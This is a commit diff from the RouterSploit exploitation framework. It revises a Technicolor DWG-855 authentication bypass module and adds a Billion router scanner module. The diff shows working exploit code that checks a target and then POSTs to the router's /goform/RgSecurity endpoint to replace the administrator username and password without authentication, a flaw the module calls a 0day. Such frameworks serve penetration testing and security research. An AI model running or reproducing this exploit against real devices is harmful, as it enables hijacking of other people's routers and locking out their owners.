Merge remote-tracking branch 'remotes/upstream/master' into credentials

1e1ad90d · Laurent Meirlaen · 5df36b5a · b76fd724 · 1e1ad90d · 1e1ad90d
Commit 1e1ad90d authored Nov 21, 2016 by Laurent Meirlaen
Show whitespace changes
Inline Side-by-side

Showing with 33 additions and 8 deletions

dwg855_authbypass.py ...rsploit/modules/exploits/technicolor/dwg855_authbypass.py +10 -8

billion_scan.py routersploit/modules/scanners/billion_scan.py +23 -0

No files found.
--- a/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
+++ b/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
@@ -16,11 +16,11 @@ class Exploit(exploits.Exploit):
    If the target is vulnerable, it allows us to overwrite arbitrary configuration parameters.
    """
    __info__ = {
-        'name': 'Technicolor DWG-855 Authentication Bypass vulnerability.',
-        'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.',
+        'name': 'Technicolor DWG-855 Auth Bypass',
+        'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous credentials, this is NOT stealthy.',
        'authors': [
-            'JPaulMora <https://JPaulMora.GitHub.io>',
-            # vulnerability discovery,routersploit module
+            'JPaulMora <https://JPaulMora.GitHub.io>',  # vulnerability discovery, routersploit module
+            '0BuRner',  # routersploit module
        ],
        'references': [
            'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
@@ -39,6 +39,8 @@ class Exploit(exploits.Exploit):
    vulnresp = "\x11\x44\x75\x63\x6b\x79\x00"  # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"

    def run(self):
+        if self.check():
+            print_success("Target is vulnerable")
            print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass)
            url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
            headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
@@ -47,13 +49,13 @@ class Exploit(exploits.Exploit):
            response = http_request(method="POST", url=url, headers=headers, data=data)

            if response is None:
-            print_error("Target didn't answer request.")
-        elif self.vulnresp in response.text.encode('utf-8'):
-            print_success("Credentials changed!")
+                print_error("Target did not answer request")
            elif response.status_code == 401:
                print_error("Target answered, denied access.")
            else:
-            print_error("Unknown error, submit an issue.")
+                print_success("Credentials changed")
+        else:
+            print_error("Exploit failed - Target seems to be not vulnerable")

    @mute
    def check(self):

--- a/routersploit/modules/scanners/billion_scan.py
+++ b/routersploit/modules/scanners/billion_scan.py
+from __future__ import absolute_import
+
+from .autopwn import Exploit as BaseScanner
+
+
+class Exploit(BaseScanner):
+    """
+    Scanner implementation for Billion vulnerabilities.
+    """
+    __info__ = {
+        'name': 'Billion Scanner',
+        'description': 'Scanner module for Billion devices',
+        'authors': [
+            'Mariusz Kupidura <f4wkes[at]gmail.com>',  # routersploit module
+        ],
+        'references': (
+            '',
+        ),
+        'devices': (
+            'Billion',
+        ),
+    }
+    vendor = 'billion'